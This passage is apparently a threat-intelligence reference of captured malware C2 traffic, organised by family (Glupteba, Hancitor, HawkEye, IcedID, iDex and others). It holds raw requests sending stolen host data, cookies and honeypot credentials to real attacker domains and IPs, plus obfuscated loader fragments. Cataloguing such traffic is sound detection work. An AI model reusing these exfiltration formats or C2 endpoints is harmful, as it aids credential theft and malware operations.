5Bzoi5p5mrTFsA12M25Ubt5SuEd-grtNyFbdev6Uyoislno4UJ9J6-8ag6iZXJd_QI17cAFS4P71bi7ApOh50qN4cNMIQBUTQyriS5BG~os6RMAuoaSUq92eNx12764W~RIGssW6ItGJFcg09D9nPLTs9jUhkhVwPicIhcak5ZLrkASapi44847mp8bI7hAIINPrZaKEyXejiDm5OUm7UVGno15_(251Jq3-Aic6sgovlTvlWBTFSkikUCmSMDX96nLlTuNiC2BD42WLJfGoZQw4T341YKl3rFShZ24mtmUGThc4k-k1OxGK1ygo5wLOg_H_Bs9MfxPn3aoIQiBq(XC7l4Xzw2LREItIvFPQXoWU(dxz3g).. 
~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/formbook.png "Formbook") #### GET2Loader (TA505): ~~~ POST /2021 HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2; CIBA; MS-RTC LM 8) Content-Length: 95 Host: windows-sys-update.com &D=User-PC&U=admin&OS=6.1&PR=Dwm.exe%7CEXCEL.EXE%7CExplorer.EXE%7Ctaskhost.exe%7Cwindanr.exe%7CHTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Wed, 09 Oct 2019 18:53:18 GMT Content-Length: 0 Connection: keep-alive ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/ta505-loader.png "TA505 Loader") #### Glupteba ~~~ POST /bots/post-ia-data?uuid=de7cfeb2-8d6a-480d-9043-488b8a616d7b HTTP/1.1 Host: venoxcontrol.com User-Agent: Go-http-client/1.1 Content-Length: 8843 Content-Type: application/json; charset=UTF-8 Accept-Encoding: gzip [{"display_name":"Security Update for Microsoft Office 2010 (KB2289161)","display_version":"","install_date":""},{"display_name":"DXM_Runtime","display_version":"","install_date":""},{"display_name":"Microsoft Visual C++ 2012 x64 Additional Runtime - 11.0.61030","display_version":"11.0.61030","install_date":"20180208"},{"display_name":"Microsoft Office Proof (French) 2010","display_version":"14.0.4763.1000","install_date":"20180126"},{"display_name":"Security Update for Microsoft Office 2010 (KB2289078)","display_version":"","install_date":""},{"display_name":"Microsoft Outlook Social Connector (KB2289116) ..........s","display_version":"","install_date":""},{"display_name":"Definition update for Microsoft Office 2010 (KB982726)","display_version":"","install_date":""},{"display_name":"Security Update for Microsoft Publisher 2010 
(KB2409055)","display_version":"","install_date":""},{"display_name":"IEData","display_version":"","install_date":""},{"display_name":"{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757","display_version":"","install_date":""},{"display_name":"Microsoft Visual C++ 2019 X64 Additional Runtime - 14.21.27702","display_version":"14.21.27702","install_date":"20190321"},{"display_name":"Microsoft Office Proof (English) 2010","display_version":"14.0.4763.1000","install_date":"20180126"},{"display_name":"Microsoft Office Shared 32-bit MUI (English) 2010","display_version":"14.0.4763.1000","install_date":"20180126"},{"display_name":"Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.21.27702","display_version":"14.21.27702.2","install_date":""},{"display_name":"Microsoft Office Professional 2010","display_version":"14.0.4763.1000","install_date":""},{"display_name":"Microsoft Office Publisher MUI (English) 2010","display_version":"14.0.4763.1000","install_date":"20180126"},{"display_name":"Microsoft Office Outlook MUI (English) 2010","display_version":"14.0.4763.1000","install_date":"20180126"},{"display_name":"Update for Microsoft Office 2010 (KB2202188)","display_version":"","install_date":""},{"display_name":"Update for Microsoft Office 2010 (KB2413186)","display_version":"","install_date":""},{"display_name":"{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173","display_version":"","install_date":""},{"display_name":"Google Update Helper","display_version":"1.3.33.23","install_date":"20190319"},{"display_name":"IE40","display_version":"","install_date":""},{"display_name":"IE4Data","display_version":"","install_date":""},{"display_name":"Java 8 Update 92 (64-bit)","display_version":"8.0.920.14","install_date":"20180208"},{"display_name":"Update for Microsoft Office 2010 (KB2413186)","display_version":"","install_date":""},{"display_name":"VLC media player","display_version":"2.2.6","install_date":""},{"display_name":"WinRAR 5.60 
(64-bit)","display_version":"5.60.0","install_date":""},{"display_name":"Microsoft Office Single Image 2010","display_version":"14.0.4763.1000","install_date":"20180126"},{"display_name":"Microsoft Office Access Setup Metadata MUI (English) 2010","display_version":"14.0.4763.1000","install_date":"20180126"},{"display_name":"Adobe Flash Player 27 PPAPI","display_version":"27.0.0.187","install_date":""},{"display_name":"Microsoft Visual C++ 2019 X86 Additional Runtime - 14.21.27702","display_version":"14.21.27702","install_date":"20190321"},{"display_name":"Mozilla Firefox 67.0.4 (x64 en-US)","display_version":"67.0.4","install_date":""},{"display_name":"SchedulingAgent","display_version":"","install_date":""},{"display_name":"Microsoft Office Excel MUI (English) 2010","display_version":"14.0.4763.1000","install_date":"20180126"},{"display_name":"Microsoft Office Shared MUI (English) 2010","display_version":"14.0.4763.1000","install_date":"20180126"},{"display_name":"Skype... 7.39","display_version":"7.39.102","install_date":"20180208"},{"display_name":"CCleaner","display_version":"5.35","install_date":""},{"display_name":"Microsoft .NET Framework 4.7.2","display_version":"4.7.03062","install_date":"20190321"},{"display_name":"Microsoft Office Access MUI (English) 2010","display_version":"14.0.4763.1000","install_date":"20180126"},{"display_name":"Update for Microsoft Office 2010 (KB2413186)","display_version":"","install_date":""},{"display_name":"Adobe Acrobat Reader DC MUI","display_version":"15.007.20033","install_date":"20180208"},{"display_name":"MPlayer2","display_version":"","install_date":""},{"display_name":"Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161","display_version":"9.0.30729.6161","install_date":"20180208"},{"display_name":"Microsoft Office Proofing (English) 2010","display_version":"14.0.4763.1000","install_date":"20180126"},{"display_name":"Microsoft Visual C++ 2019 X86 Minimum Runtime - 
14.21.27702","display_version":"14.21.27702","install_date":"20190321"},{"display_name":"Microsoft Office Proof (Spanish) 2010","display_version":"14.0.4763.1000","install_date":"20180126"},{"display_name":"Microsoft Visual C++ 2019 X64 Minimum Runtime - 14.21.27702","display_version":"14.21.27702","install_date":"20190321"},{"display_name":"Adobe Flash Player 27 ActiveX","display_version":"27.0.0.187","install_date":""},{"display_name":"Adobe Flash Player 27 NPAPI","display_version":"27.0.0.187","install_date":""},{"display_name":"Google Chrome","display_version":"75.0.3770.100","install_date":"20180208"},{"display_name":"Microsoft Office Word MUI (English) 2010","display_version":"14.0.4763.1000","install_date":"20180126"},{"display_name":"Update for Microsoft OneNote 2010 (KB2433299)","display_version":"","install_date":""},{"display_name":"Microsoft Office OneNote MUI (English) 2010","display_version":"14.0.4763.1000","install_date":"20180126"},{"display_name":"Microsoft Visual C++ 2013 x64 Minimum Runtime - 12.0.21005","display_version":"12.0.21005","install_date":"20180208"},{"display_name":"{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573","display_version":"","install_date":""},{"display_name":"Realtek AC'97 Audio","display_version":"","install_date":""},{"display_name":"MobileOptionPack","display_version":"","install_date":""},{"display_name":"Microsoft Office PowerPoint MUI (English) 2010","display_version":"14.0.4763.1000","install_date":"20180126"},{"display_name":"Microsoft Visual C++ 2015-2019 Redistributable (x64) - 14.21.27702","display_version":"14.21.27702.2","install_date":""},{"display_name":"Update for Microsoft .NET Framework 4.7.2 (KB4087364)","display_version":"1","install_date":""},{"display_name":"Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030","display_version":"11.0.61030.0","install_date":""},{"display_name":"AddressBook","display_version":"","install_date":""},{"display_name":"Security Update for Microsoft Word 2010 
(KB2345000)","display_version":"","install_date":""},{"display_name":"Microsoft Office Shared Setup Metadata MUI (English) 2010","display_version":"14.0.4763.1000","install_date":"20180126"},{"display_name":"Microsoft .NET Framework 4.7.2","display_version":"4.7.03062","install_date":""},{"display_name":"Connection Manager","display_version":"","install_date":""},{"display_name":"Fontcore","display_version":"","install_date":""},{"display_name":"Security Update for Microsoft Office 2010 (KB2289161)","display_version":"","install_date":""},{"display_name":"Microsoft Visual C++ 2013 x64 Additional Runtime - 12.0.21005","display_version":"12.0.21005","install_date":"20180208"},{"display_name":"Mozilla Maintenance Service","display_version":"67.0.4","install_date":""},{"display_name":"Notepad++ (64-bit x64)","display_version":"7.5.1","install_date":""},{"display_name":"WIC","display_version":"","install_date":""},{"display_name":"QEMU guest agent","display_version":"2.10.68","install_date":"20190730"},{"display_name":"Update for Microsoft Outlook Social Connector (KB2289116)","display_version":"","install_date":""},{"display_name":"Microsoft Office Office 32-bit Components 2010","display_version":"14.0.4763.1000","install_date":"20180126"},{"display_name":"Java Auto Updater","display_version":"2.8.92.14","install_date":"20180208"},{"display_name":"DirectDrawEx","display_version":"","install_date":""},{"display_name":"IE5BAKEX","display_version":"","install_date":""},{"display_name":"Opera 12.15","display_version":"12.15.1748","install_date":""},{"display_name":"Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219","display_version":"10.0.40219","install_date":"20180208"},{"display_name":"Microsoft Visual C++ 2005 Redistributable (x64)","display_version":"8.0.61000","install_date":"20180208"},{"display_name":"Microsoft Visual C++ 2012 x64 Minimum Runtime - 11.0.61030","display_version":"11.0.61030","install_date":"20180208"},{"display_name":"Microsoft Visual C++ 
2013 Redistributable (x64) - 12.0.30501","display_version":"12.0.30501.0","install_date":""}] ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/glupteba-1.png "Glupteba") ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/glupteba-2.png "Glupteba") #### Godzilla Loader ~~~ GET /gate16.php?g=-994429369&k=7NLp9MrFuKWnfhYAmxKEcsWO2 HTTP/1.1 Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: filesdb.ru Connection: Keep-Alive HTTP/1.1 200 OK Server: nginx Date: Sat, 01 Sep 2018 12:12:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Keep-Alive: timeout=60 Set-Cookie: PHPSESSID=btq14ialn2bbefrsvedfspt9s4; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Encoding: gzip
IKqglmKsWN8CSCWpwIItt6O/sFpxceFdZPucGXeeUi1CbtjgXllqiSnOcsojWNxNP8ySG4XsKU94bKJh2vFSAtqb+g939WslRHMzKsr2YaDwN51PG9a/CZ/BVaK3Idznf3tkNJAy9+6r6vj/9spjxPp1+pqK3DrdVr7uJG0xkSv8Ez7fmCPgc4YrHpSk2cMvODT9bbv1eNE4zjGd+N4t3Lhp/+k48QWtGIQ48A6Q9HzhWO1L4SpVawEVg/hbN+EJSCVhQCIljVpvrcyeY6w1yX9QT5TSZosQlbzog3mLceYYz1teNlHwhGToXVDb9ACyxlo/FrdlapR/R0jCx0F+OQ==
~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/godzilla.png "Godzilla Loader") #### GrandSteal ~~~ GET /websocket HTTP/1.1 Host: 162.218.122.115:2012 Upgrade: websocket Connection: Upgrade Sec-WebSocket-Version: 13 Sec-WebSocket-Key: Yzg2MDllOTctZGYzMCOOZQ== Origin: ws://162.218.122.115:2012 HTTP/1.1 101 Switching Protocols Server: nginx Date: Fri, 18 Oct 2019 00:41:37 GMT Connection: upgrade Upgrade: WebSocket Sec-WebSocket-Accept: 3pYl7XQW+GMu4ydBWBEUXbuIKJo= .þ... o>..Í8).i<. e-_A.Mjc.WjN.mjT.WaG.,.U.SnJ%._y.>. o>. o>. o>. o>. o>. o>. o>. o>. o>. o>. o>. o>. o>. o>. o> . o>. o>. o>. o>. o>. o>. o>. o>. o>. o>. o>. o>. o>. o>. o>. o>. o>. o>. o>. o>. o>. o>. o>. o>. o>. o>. o>. o> . o>. o>. o>. o>. o>. o>. o>. o>. o>. o> .~..."ª..Ê.......... .(.8.@...ugmajJAPYc ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/grandsteal.png "GrandSteal") #### Hancitor ~~~ POST /4/forum.php HTTP/1.1 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: spausence.com Content-Length: 108 Cache-Control: no-cache GUID=8996434259757519954&BUILD=0210_328487&INFO=USER-PC @ USER-PC\admin&IP=89.187.165.57&TYPE=1&WIN=6.1(x64)HTTP/1.1 200 OK Server: nginx/1.10.3 Date: Thu, 03 Oct 2019 17:17:51 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/5.4.45 
FFUUARZAEg4OCkBVVQ0NDVQVFB8eEx0TGBUCVBkVF1UNClcZFRQOHxQOVQoWDx0TFAlVCRcbCA5XCRYTHh8IV0lVExQZFg8eHwlVSwYSDg4KQFVVDQ0NVA4SGVcbFBQfAlQZFRdVDQpXGRUUDh8UDlVLBhIODgpAVVUXGw4fCBMbFlcUHwgPHlQID1UNClcTFBkWDx4fCVUKFRcVVUsGEg4OCkBVVRkWHwwfCB8eDxkbDhMVFFQZFRdUGw9VDQpXExQZFg8eHwlVDRMeHR8OCVVLBhIODgpAVVUfGRsIHwoSVBUIHVUNClcZFRQOHxQOVQoWDx0TFAlVGBgKFQ0fCAobGRFVExQZFg8eHwlVSwcBGEASDg4KQFVVDQ0NVBUUHx4THRMYFQJUGRUXVQ0KVxkVFA4fFA5VChYPHRMUCVUJFxsIDlcJFhMeHwhXSVUTFBkWDx4fCVVIBhIODgpAVVUNDQ1UDhIZVxsUFB8CVBkVF1UNClcZFRQOHxQOVUgGEg4OCkBVVRcbDh8IExsWVxQfCA8eVAgPVQ0KVxMUGRYPHh8JVQoVFxVVSAYSDg4KQFVVGRYfDB8IHx4PGRsOExUUVBkVF1QbD1UNClcTFBkWDx4fCVUNEx4dHw4JVUgGEg4OCkBVVR8ZGwgfChJUFQgdVQ0KVxkVFA4fFA5VChYPHRMUCVUYGAoVDR8IChsZEVUTFBkWDx4fCVVIBwEIQBIODgpAVVUNDQ1UFRQfHhMdExgVAlQZFRdVDQpXGRUUDh8UDlUKFg8dExQJVQkXGwgOVwkWEx4fCFdJVRMUGRYPHh8JVUkGEg4OCkBVVQ0NDVQOEhlXGxQUHwJUGRUXVQ0KVxkVFA4fFA5VSQYSDg4KQFVVFxsOHwgTGxZXFB8IDx5UCA9VDQpXExQZFg8eHwlVChUXFVVJBhIODgpAVVUZFh8MHwgfHg8ZGw4TFRRUGRUXVBsPVQ0KVxMUGRYPHh8JVQ0THh0fDglVSQYSDg4KQFVVHxkbCB8KElQVCB1VDQpXGRUUDh8UDlUKFg8dExQJVRgYChUNHwgKGxkRVRMUGRYPHh8JVUkH
~~~
![alt text](https://github.com/silence-is-best/c2db/blob/master/images/hancitor.png "Hancitor")

#### Hawkeye keylogger

~~~
From: mosharrof@mhcapparels.com
To: mosharrof@mhcapparels.com
Date: 9 Oct 2019 01:57:35 +0100
Subject: HawkEye Keylogger - Reborn v9 - Passwords Logs - admin \ USER-PC - 89.187.165.47
Content-Type: text/plain; charset=utf-8
Content-Transfer-Encoding: base64

SGF3a0V5ZSBLZXlsb2dnZXIgLSBSZWJvcm4gdjkNClBhc3N3b3JkcyBMb2dzDQphZG1p
biBcIFVTRVItUEMNCg0KPT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09
PT09PT09PT09PT09PT0NClVSTCAgICAgICAgICAgICAgIDogaHR0cHM6Ly9tLmZhY2Vi
b29rLmNvbQ0KV2ViIEJyb3dzZXIgICAgICAgOiBGaXJlZm94IDMyKw0KVXNlciBOYW1l
ICAgICAgICAgOiBob25leUBwb3QuY29tDQpQYXNzd29yZCAgICAgICAgICA6IGhvbmV5
~~~
![alt text](https://github.com/silence-is-best/c2db/blob/master/images/hawkeye.png "Hawkeye")

#### Icedid

~~~
GET /photo.png?id=0181B9BACBCF3080870000000000FF40000001 HTTP/1.1
Connection: Keep-Alive Host: eurobable.com HTTP/1.1 200 OK Server: openresty Date: Wed, 16 Oct 2019 15:30:33 GMT Content-Type: application/octet-stream Content-Length: 605211 Connection: keep-alive Last-Modified: Tue, 08 Oct 2019 11:43:19 GMT ETag: "5d9c7657-93c1b" Accept-Ranges: bytes .PNG . ... IHDR..............N.T....sRGB.........gAMA......a.... pHYs..........o.d. ;.IDATOLrEV.....Le.D|...Rp.{..D...g`...a@.\8,E .~1Z..X.N...^G.....,f$.c.......ru.#O..'.~. ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/icedid-2.png "Icedid") URI for websocket is usually data2.php ~~~ GET /data2.php?1C00C7CC98D464FE HTTP/1.1 Host: memphase.com Upgrade: websocket Connection: Upgrade HTTP/1.1 101 Switching Protocols Server: openresty Date: Thu, 10 Oct 2019 19:28:34 GMT Connection: upgrade Sec-WebSocket-Accept: Kfh9QIsMVZcl6xEPYxPHzW8SZ8w= Upgrade: websocket ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/icedid.png "Icedid websocket") New Loader ~~~ GET / HTTP/1.1 Connection: Keep-Alive Host: karantino.xyz HTTP/1.1 200 OK Server: nginx Date: Fri, 27 Mar 2020 16:07:26 GMT Content-Type: text/html Content-Length: 489 Connection: keep-alive Last-Modified: Wed, 29 Jan 2020 08:16:06 GMT ETag: "5e313f46-1e9" Accept-Ranges: bytes Site under reconstruction GET /background.png HTTP/1.1 Connection: Keep-Alive Cookie: __gads=3341780230:0:418500:437:83; _gat=10.0.16299.64; _ga=1.329443.0.66; _u=4445534B544F502D4A474C4C4A4C44:61646D696E; __io=21_1693682860_607145093_2874071422; _gid=92AA106A8DB0 Host: karantino.xyz HTTP/1.1 200 OK Server: nginx Date: Fri, 27 Mar 2020 16:07:27 GMT Content-Type: image/png Content-Length: 314160 Connection: keep-alive .PNG . ... IHDR...............#&....sRGB.........gAMA......a.... pHYs..."...".........IDATx^....lKz..e....>...0.f.s.... 
f...`...J..."$...!Qv.a9...p..............6....|...+..#.2M.2 ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/icedidloader.png "IcedID Loader") #### iDex Stealer ~~~ GET /index.php HTTP/1.1 Host: etips.fun Connection: Keep-Alive HTTP/1.1 200 OK Server: nginx-reuseport/1.13.4 Date: Fri, 03 Apr 2020 12:43:55 GMT Content-Type: text/html Content-Length: 216 Connection: keep-alive Keep-Alive: timeout=30 Vary: Accept-Encoding X-Powered-By: PHP/7.1.33 Set-Cookie: PHPSESSID=f9eaff206353e78017c4257960c13590; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache YZAt44SJ3KsHldzHPnF8nveX4cBoS359sHzCXSUuwew/C6IEa7/zMjViaOVMK2EMfO1X+lcr24gD5S4LRuHREupBfWGdnGzfg5brXc1OuiMTRnOZ/iS9Vps9/B7Q+08m/137OU7V41UEx2QckwuZ9KeDTSjzmMv32Eewq0GUPiyQ5iFOOZ+8jGOXC1v8CsVqFfJYpKC2cCSLIQWDi6VzrQ== POST /gate.php HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accepts-Language: en-us,en;q=0.5 Content-Type: multipart/form-data; boundary=---------------------------8d7d7ccad7ce23c Host: etips.fun Content-Length: 1191325 Expect: 100-continue -----------------------------8d7d7ccad7ce23c Content-Disposition: form-data; name="hwid" EEEB5D54788042A7B542739BBC26CF4B -----------------------------8d7d7ccad7ce23c Content-Disposition: form-data; name="os" Windows 7 x64 -----------------------------8d7d7ccad7ce23c Content-Disposition: form-data; name="platform" null -----------------------------8d7d7ccad7ce23c Content-Disposition: form-data; name="user" admin -----------------------------8d7d7ccad7ce23c Content-Disposition: form-data; name="passwordCount" 0 -----------------------------8d7d7ccad7ce23c Content-Disposition: form-data; name="coins" 0 -----------------------------8d7d7ccad7ce23c Content-Disposition: form-data; name="forms" 0 -----------------------------8d7d7ccad7ce23c Content-Disposition: form-data; name="cookies" 0 -----------------------------8d7d7ccad7ce23c Content-Disposition: 
form-data; name="ccCount" 0 -----------------------------8d7d7ccad7ce23c Content-Disposition: form-data; name="telegram" 0 -----------------------------8d7d7ccad7ce23c Content-Disposition: form-data; name="steam" null -----------------------------8d7d7ccad7ce23c Content-Disposition: form-data; name="logs"; filename="Archive.zip" Content-Type: zip PK........|e.P.R.y........=...Browsers/Cookies/Firefox Mozilla_nltxvmn2.default_Cookies.txt..]s.0.........r..b.V.Tk...CB.h......bggg........>y&..t2+u).26.>3.^..........(....$.C...o..n9.........P.4.fHTa9{OH.Q.I....?W...HG..&YC6 ..W.fR.9...x...E.r2..^.."....hM..|n.......e.Ef`+.P .!Lm....B.a.MQj..T.3W$..1....J..c.....n.. ....Zg!v;.....c..7r4.......X....(....}U.^...;.k.>....7PK........|e.P....i...Jr......Screenshot.png..w8[...o"v..G..Y#f..U]F......J.XE4}.......}...U...XuW.yq.|.....*.P....&.b.v.R.[......^.>..PK..........|e.P.R.y........=.................Browsers/Cookies/Firefox Mozilla_nltxvmn2.default_Cookies.txtPK..........}e.PpT.-.... ...+.................Browsers/Cookies/Chrome_Default_Cookies.txtPK..........|e.P....i...Jr................Y...Screenshot.pngPK..........}e.P?c .T...Z... 
.................Passwords.txtPK..........}e.P.s%.[...v.................m...Browsers.txtPK..........}e.PE.............................Information.txtPK....................iDex STEALER VERSION : 1.0.0 ==========================GEOIP Info========================== IP : 84.17.36.75 Country : Sweden CountryCode : SE Region : AB Region Name : Stockholm City : Stockholm Zip : 164 94 TimeZone : Europe/Stockholm ISP : Datacamp Limited ==========================Hardware Info========================== Username : admin PCName : USER-PC UUID : 00371-461-1206131-85808 HWID : EEEB5D54788042A7B542739BBC26CF4B OS : Windows 7 x64 CPU : Intel(R) Core(TM) i5-6400 CPU @ 2.70GHz GPU : Standard VGA Graphics Adapter RAM : 4 GB MAC : 5254004AAD21 Screen Resolution : 1280x720 Layout Language : English (United States) PC Time : 4/3/2020 12:43:57 PM (UTC) Coordinated Universal Time ==========================Program Info========================== Adobe Flash Player 27 ActiveX 27.0.0.187 Microsoft Visual C++ 2015-2019 Redistributable (x64) - 14.21.27702 14.21.27702.2 ==========================Program Info========================== svchost lsm svchost spoolsv svchost lsass dllhost SearchProtocolHost svchost csrss e197329d5376b93a60e67a43d5390a16dae5e813c2ee3708420a785d8b1b1a46 csrss dwm services windanr wininit svchost SearchFilterHost taskhost svchost IMEDICTUPDATE SearchIndexer svchost explorer svchost OSPPSVC SearchProtocolHost svchost svchost winlogon smss System Idle -----------------------------8d7d7ccad7ce23c-- ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/idex1.png "iDex") ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/idex2.png "iDex") ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/idex3.png "iDex") #### iDex New aka MatrixMax stealer ~~~ POST /gate.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: max099801.000webhostapp.com Content-Length: 936413 Expect: 100-continue Connection: Keep-Alive 
zipx=UEsDBBQAAAgIALOmj ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/idex-new.png "iDex New") #### Imminent RAT ~~~ 00000000 06 00 00 00 81 13 14 6e 5b 69 .......n [i ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/imminent-1.png "Imminent") ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/imminent-2.png "Imminent") #### ISRStealer ~~~ GET /boss/index.php?action=add&username=honey@pot.com&password=honeypass356&app=Opera&pcname=USER-PC&sitename=https://www.facebook.com HTTP/1.1 User-Agent: HardCore Software For : Public Host: expressdeliveryfx.com Cookie: PHPSESSID=ni2v6p8vt6p48qcvm48rj7qqt0 HTTP/1.1 200 OK Connection: Keep-Alive X-Powered-By: PHP/5.6.40 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 Content-Length: 0 Date: Tue, 08 Oct 2019 14:06:15 GMT Server: LiteSpeed ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/isrstealer.png "ISRStealer") #### JasperLoader ~~~ GET /?b=USER-PC_DELL_30fbefd6&os=6.1.7601.17514&v=327.2&psver=2 HTTP/1.1 Host: green.datota.it Connection: Keep-Alive HTTP/1.1 200 OK Server: nginx/1.14.2 Date: Thu, 28 Mar 2019 17:41:51 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 115 Connection: keep-alive X-Powered-By: PHP/5.4.16 u|http://red.greenmira.com/cryptbody2.php|http://red.greenmira.com/loadercrypt_823EF8A810513A4071485C36DDAD4CC3.php ~~~ ~~~ GET /cryptbody2.php?b=USER-PC_DELL_30fbefd6&os=6.1.7601.17514&v=327.2&psver=2 HTTP/1.1 Host: red.greenmira.com Connection: Keep-Alive HTTP/1.1 200 OK Server: nginx/1.14.2 Date: Thu, 28 Mar 2019 17:41:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/5.4.16 t6i3jf5s(h6 ac(wtGite5ite0-bdUsaI53Cwfu52ls4tf6u0eryze76)3x.ccNi3af5mtdex4 6y-76m4da05tu1cijhzw jz'02RdtU7i|v2UjsAzu|86BcxYtz|0gCehNuh'hw 
4a-ixo07rwg 9v(tcGh3exdtai-bwWa7m7sixdOyibybjxfe6zcxdtja cj-86cjdls1awisu3s7b c1W35i3dn1s36z2iz_hgCvuo36m3aphxucyt6je9ersbShuyxxsxittfeyhm5y xc-8vP5arw5o17pujed4r44t1iyhu i4Mfsowedude2vlie)0a.cdMt6ovtdybe6xl09 bs-xumu1ah8tefc94ht3 8x'3iV87Mftwvya20r74ej8'3h ac)3x{w7 ydeyaxueijjtus;sg 6w}zw e2 ezFavu0vnavc66tztiv2owhnx9 yeChzr9cecja02ty3eu6Suvh7uo42rc3tg9ci9u49tdu(1j 2z$f7lvbngfk0y,a4 7c$etAehrfegz5uzbm98eyhnaft7zsf4,fc zz$efW2johbr28kihihfnvcga5Divijar2sezyc9ithxog6rxty39 1f)t1{eb vv yw 5bt3wrt1ytu{ai cc 01 wb tz b9$41Sz9hbheacly2l64 us=sh gbNz ~~~ ~~~ GET /loadercrypt_823EF8A810513A4071485C36DDAD4CC3.php?b=USER-PC_DELL_30fbefd6&os=6.1.7601.17514&v=327.2&psver=2 HTTP/1.1 Host: red.greenmira.com HTTP/1.1 200 OK Server: nginx/1.14.2 Date: Thu, 28 Mar 2019 17:41:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/5.4.16 vtyzhsjuxvzxhbgfsdzdzzb = " "; ibcvwj = new Array(); ibcvwj.push("iavSxyfERDVE(t8E8a974CDQ6y"); ibcvwj.push(""); ibcvwj.push("885tSDCB4aw"); ibcvwj.push("wR6EREzW>CzEz54zRy361wRDt97y"); ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/jasperloader.png "JasperLoader") #### JsOutProx ~~~ POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-Form-urlencoded; Charset=UTF-8 Accept: */* Accept-Encoding: gzip, deflate Cookie: _uot=43344241333634375f7c5f38396139633066382d393535362d346339662d626363642d6330373464646331346230395f7c5f555345522d50435f7c5f61646d696e5f7c5f4d6963726f736f66742057696e646f777320372050726f66657373696f6e616c205f7c5f362e312e373630315f7c5f4a734f757450726f785f7c5f70696e67 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:70.0) Gecko/20100101 Firefox/70.0 Content-Length: 0 Host: 91.189.180.199:9989 HTTP/1.1 200 OK Content-Type: image/jpeg Set-Cookie: _utl=73646e5f7c5f Content-Length: 20164 Connection: close 
AAEAAAD/////AQAAAAAAAAAEAQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5IlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJAgAAAAkDAAAACQQAAAAEAgAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRUeXBlTmFtZQptZXRob2ROYW ~~~ Hex decoded cookie example from above: ~~~ C4BA3647_|_89a9c0f8-9556-4c9f-bccd-c074ddc14b09_|_USER-PC_|_admin_|_Microsoft Windows 7 Professional _|_6.1.7601_|_JsOutProx_|_ping ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/jsoutprox.png "JsOutProx") #### JSSLoader ~~~ POST /gate.php?bot_id=JenniferPCJENNIFERPCVMware564db87746ebb934e9e0b94b413682b8 HTTP/1.1 Content-Type: application/json Host: dempoloka.com Content-Length: 242 Expect: 100-continue Connection: Keep-Alive AAAAAA== 